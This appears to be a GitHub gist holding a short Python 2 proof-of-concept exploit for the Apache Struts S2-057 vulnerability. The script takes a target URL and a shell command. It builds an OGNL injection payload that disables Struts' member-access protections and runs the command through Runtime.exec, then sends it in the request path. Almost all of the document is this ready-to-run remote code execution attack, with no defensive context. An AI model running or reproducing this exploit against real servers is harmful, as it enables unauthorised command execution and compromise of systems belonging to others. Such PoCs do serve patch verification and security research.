Skip to content

Instantly share code, notes, and snippets.

@frohoff frohoff/s2-057.py
Created Aug 23, 2018

Embed
What would you like to do?
Struts S2-057 PoC exploit
# some ideas from https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg
import sys
import urllib
import urllib2
if len(sys.argv) != 3:
print 'Usage: %s [url] [command]' % sys.argv[0]
exit(1)
_, url, cmd = sys.argv
payload = "${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#context=#request['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedPackageNames('')).(#ognlUtil.setExcludedClasses('')).(#context.setMemberAccess(#dm)).(#cmd=@java.lang.Runtime@getRuntime().exec('%s'))}" % (cmd.replace('\\','\\\\').replace("'","\\'"))
url_parts = url.rsplit('/', 1)
request = url_parts[0] + '/' + urllib.quote(payload) + '/' + url_parts[1]
print 'payload: %s' % payload
print 'request: %s' % request
print 'making request'
urllib.urlopen(request)
print 'done'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.